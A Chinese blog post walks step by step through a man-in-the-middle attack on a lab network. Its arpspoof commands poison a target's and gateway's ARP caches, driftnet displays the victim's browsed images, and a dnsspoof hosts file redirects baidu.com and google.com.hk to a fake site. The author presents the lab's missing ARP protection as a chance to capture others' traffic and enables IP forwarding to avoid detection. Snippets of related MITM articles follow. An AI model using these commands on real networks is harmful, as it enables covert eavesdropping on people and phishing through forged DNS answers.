arpspoof dnsspoof中间人攻击

最近搞了一个监听神器,尽管使用了网卡混杂模式,不过监听到的几乎全是本地流量, 为了获取更多有用的数据,搞一下中间人攻击,最基本的就是arpspoof + IP转发,这样就可以获得局域网内任何人的上网流量, 难得的是实验室没有做ARP防护,给arpspoof一个大行其道的机会。

arpspoof

  1. 实战环境
  2. 攻击者(kali linux):10.10.10.1
  3. 攻击目标:10.10.10.2
  4. 默认网关:10.10.10.254
  5. 攻击步骤

首先在本地开启IP转发,否则很容易被发觉。

echo 1 >> /proc/sys/net/ipv4/ip_forward

用man arpspoof查看参数详细说明
首先跟10.10.10.2说我是网关10.10.10.254

arpspoof -i eth0 -t 10.10.10.2 10.10.10.254

然后跟网关10.10.10.254说我是10.10.10.2,完成双向欺骗

arpspoof -i eth0 -t 10.10.10.254 10.10.10.2

上面两条arpspoof指令可以用下面一个指令完成

arpspoof -i eth0 -t 10.10.10.2 -r 10.10.10.254

最后利用driftnet工具捕获并友好地显示10.10.10.2在网上浏览的图片

driftnet -i eth0

REF

dnsspoof

  1. 攻击环境
  2. 攻击者(kali linux):10.10.10.1
  3. 攻击目标:10.10.10.2
  4. 默认网关:10.10.10.254
  5. DNS服务器: 8.8.8.8
  6. 伪造网站: 10.10.10.3
  7. 攻击步骤

先进行arp欺骗,以中转攻击目标的所有上网流量

echo 1 >> /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 10.10.10.2 10.10.10.254
arpspoof -i eth0 -t 10.10.10.254 10.10.10.2

按照hosts文件格式,创建一个dnsspoof.hosts文件,
当受害者请求该文件中的域名解析时,我们就返回给他一个伪造的IP地址,让其访问我们伪造的网站。

cat dnsspoof.hosts
10.10.10.3 .baidu.com
10.10.10.3
.google.com.hk

执行dnsspoof, -f指定hosts文件,host 10.10.10.2 and udp port 53 遵从tcpdump流量过滤规则

dnsspoof -i eth0 -f dnsspoof.hosts host 10.10.10.2 and udp port 53

这样当攻击目标10.10.10.2访问baidu.com或者google.com.hk时,受害者访问的实际上是10.10.10.3指定的网站。

通过抓包分析,dnsspoof的原理如下

由于DNS协议使用是传输层协议是UDP协议,
这样无需像TCP那样建立连接就可以轻松的伪造应答包,包括源IP.
10.10.10.2发送DNS 查询包问DNS服务器www.baidu.com的IP地址是多少?
10.10.10.1装作DNS服务器(伪造IP)向攻击目标发送一个DNS响应包说www.baidu.com的IP地址是10.10.10.3。

时间: 2024-08-27 03:44:53

arpspoof dnsspoof中间人攻击的相关文章

SSH V2的中间人攻击

SSH V2的中间人攻击 2012-12-19 10:48:52     我来说两句      作者:Dis9Team 收藏    我要投稿 中间人攻击(Man-in-the-MiddleAttack,简称“MITM攻击”)中间人攻击很早就成为了黑客常用的一种古老的攻击手段,并且一直到今天还具有极大的扩展空间. 在网络安全方面,MITM攻击的使用是很广泛的,曾经猖獗一时的SMB会话劫持.DNS欺骗等技术都是典型的MITM攻击手段.在黑客技术越来越多的运用于以获取经济利益为目标的情况下时,MITM

ettercap 实施中间人攻击

中间人攻击(Man-in-the-MiddleAttack 简称"MITM攻击")中间人攻击很早就成为了黑客常用的一种古老的攻击手段,并且一直到如今还具有极大的扩展空间,在网络安全方面,MITM攻击的使用是很广泛的,曾经猖獗一时的SMB会话劫持.DNS欺骗等技术都是典型的MITM攻击手段.在黑客技术越来越多的运用于以获取经济利益为目标的情况下时,MITM攻击成为对网银.网游.网上交易等最有威胁并且最具破坏性的一种攻击方式, 随着计算机通信网技术的不断发展,MITM攻击也越来越多样化.最

Android 中间人攻击

0x00 Android中间人攻击的思路就是劫持局域网中被攻击机器和server间的对话.被攻击机器和server表面上工作正常,实际上已经被中间人劫持.能够从一张图来明确这个过程. 受攻击主机发送的数据,首先经过了攻击者.从server返回的数据也经过攻击者,再发送给受攻击主机. 0x01 Android开源中间人攻击样例.请參考https://github.com/ssun125/Lanmitm.我们这里主要分析这个链接中效果预览中会话劫持的原理. watermark/2/text/aHR0

ARP欺骗与中间人攻击

前言: 上一篇WPA/WAP2wifi 密码破解笔记说到如何探测附近开放的AP并且破解进入,那么进入别人据局域网我们能干些什么呢?换句话说如果别人进入了我们内部网络,会有什么影响?本文简要介绍了ARP和MITM原理,并在实际环境中对目标主机的流量进行劫持.曝露了公共网络中普遍存在的问题,藉此来看看局域网中的客户端究竟面临着怎样的隐私泄漏和安全风险. ARP与MITM原理 什么是ARP ARP全称为Address Resolution Protocol,即地址解析协议.是根据IP地址获取物理地址的

中间人攻击之arp欺骗 科普ARP欺骗

中间人攻击之arp欺骗 科普ARP欺骗 A <-> B A中有个ARP Table,每次发包都会在此Table中查找,若找不到,发APR Request包询问.此时若hacker冒充B的MAC,于是A -> hacker. (1)如何清空A中的ARP Table?不然它一查询,直接发包给B. 经过百度: ARP Table采用老化机制,某一行一段时间不用就被删除,提速. hacker大量发ARP包产生大量ARP通信量使通络堵塞,A就找不到B,A必然会发ARP Request包问:B是谁,

HTTPS及HTTPS中间人攻击

全站HTTPS正在称为潮流趋势,国内实现全站https的有淘宝和百度两家 0x01:https的作用 C I A:机密性,完整性,可用性(可用性是合法用户可以访问自己有权限访问的资源) 解决的是信息传输中数据被篡改.窃取 加密:对称.非对称.单向 0x02:https工作原理 https的工作原理还是有必要研究下的(原理我也是从网上学习总结的,感谢这些前辈) 1. 客户端发起HTTPS请求 用户在浏览器里输入一个https网址,然后连接到server的443端口. 2. 服务端的配置 采用HTT

中间人攻击的原理与实现

  看风云无忌一时有些迟疑.   那男子冷笑道:"你是新飞升的吧.妖魔吃人,人吃妖魔,这个道理你迟早会明白.莽莽大地,除却那植物之外,所有行走之物,均强于人类.你若是想不通,以后就和一些低等妖兽一般,去吃那树上的野果吧." --飞升之后 · 荧惑 风云无忌 下面是整篇文章的鸟瞰图:(读者应该了解局域网ARP协议) 上图便是局域网中的中间人攻击的大概思想,下面给出具体的实现方法: (备注:右键另存为 大图较清晰) 实现"中间人"的情景,有两个关键点: · ARP欺骗:

【安全牛学习笔记】SSL、TLS中间人攻击

╋━━━━━━━━━━━━━━━━━╋ ┃SSL中间人攻击                                    ┃ ┃攻击者位于客户端和服务器通信链路中┃ ┃    ARP                                                  ┃ ┃    DHCP                                               ┃ ┃    修改网关                                    

2017-2018-2 20155315《网络对抗技术》免考四:中间人攻击

原理 中间人攻击(Man-in-the-Middle Attack, MITM)是一种由来已久的网络入侵手段,并且在今天仍然有着广泛的发展空间,如SMB会话劫持.DNS欺骗等攻击都是典型的MITM攻击.简而言之,所谓的MITM攻击就是通过拦截正常的网络通信数据,并进行数据篡改和嗅探,而通信的双方却毫不知情. arp欺骗 攻击者可以根据用户与服务器之间ARP广播包,可以伪装成一方告诉另一方假地址来获取敏感信息. ARP欺骗是黑客常用的攻击手段之一,ARP欺骗分为二种: 对路由器ARP表的欺骗:截获